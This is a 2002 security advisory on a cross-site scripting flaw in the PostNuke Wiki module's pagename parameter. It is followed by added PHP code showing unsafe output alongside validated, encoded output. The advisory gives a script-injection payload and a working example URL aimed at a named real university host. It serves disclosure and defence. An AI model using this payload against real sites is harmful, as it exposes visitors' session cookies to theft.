Wiki module PostNuke Cross Site Scripting Vulnerability

2002-07-18T00:00:00
ID SECURITYVULNS:DOC:3229
Type securityvulns
Reporter Securityvulns
Modified 2002-07-18T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Class : Input Validation Error

Risk : Due to the simplicity of the attack and the number of sites that run phpwiki, the risk is classified as Medium to High.


This wiki is running as a PostNuke module.


Exploit: pagename=|script|alert(document.cookie)|/script|

Replace | with < and >.

Working Example :

http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

-

The programmer of the Wiki module and the admin of postnuke-espanol.org receive a copy of this report.


Regards

Pistone


Http://www.gauchohack.com.ar Http://www.hackindex.org

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz PlAN98+qigqp8S9pkkfFRm4= =c2FT -----END PGP SIGNATURE-----
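
The input validation error reported above comes down to the `pagename` request value reaching the HTML response unencoded. The following is an added example, not code from the Wiki module or from the advisory: it contrasts that pattern with a validated and output-encoded form. The function names, the allow-list policy, the default page name and the sample inputs are assumptions made for illustration.

```php
<?php
// Added illustration. render_title_unsafe() and render_title_safe() are
// hypothetical names, not functions from the PostNuke Wiki module.

// Vulnerable pattern: the request value is copied into the page unchanged,
// so markup supplied in pagename is interpreted by the browser.
function render_title_unsafe(string $pagename): string
{
    return '<h1>' . $pagename . '</h1>';
}

// Hardened pattern: validate against an allow-list, then encode on output.
function render_title_safe(string $pagename): string
{
    // Assumed policy: letters, digits, space, underscore, hyphen; 1-64 chars.
    // Invalid UTF-8 makes preg_match() return false and is rejected as well.
    if (!preg_match('/\A[\p{L}\p{N} _-]{1,64}\z/u', $pagename)) {
        $pagename = 'HomePage'; // assumed default page name
    }
    // Encode regardless, so a later loosening of the allow-list stays safe.
    $encoded = htmlspecialchars($pagename, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>' . $encoded . '</h1>';
}

// Encoding alone, for places where the raw name must be echoed back
// (for example in a "page not found" message).
function render_not_found(string $pagename): string
{
    $encoded = htmlspecialchars($pagename, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>Page "' . $encoded . '" does not exist.</p>';
}

// Constructed sample inputs: a normal page name, the value from the
// advisory with | replaced, and a name containing HTML metacharacters.
$samples = [
    'FrontPage',
    '<script>alert(document.cookie)</script>',
    'Tom & "Jerry"',
];

foreach ($samples as $value) {
    echo "input:     ", $value, "\n";
    echo "unsafe:    ", render_title_unsafe($value), "\n";
    echo "safe:      ", render_title_safe($value), "\n";
    echo "not found: ", render_not_found($value), "\n\n";
}
```

Run from the command line with `php`, the "unsafe" lines show the markup passing through intact, while the other two forms emit only inert text.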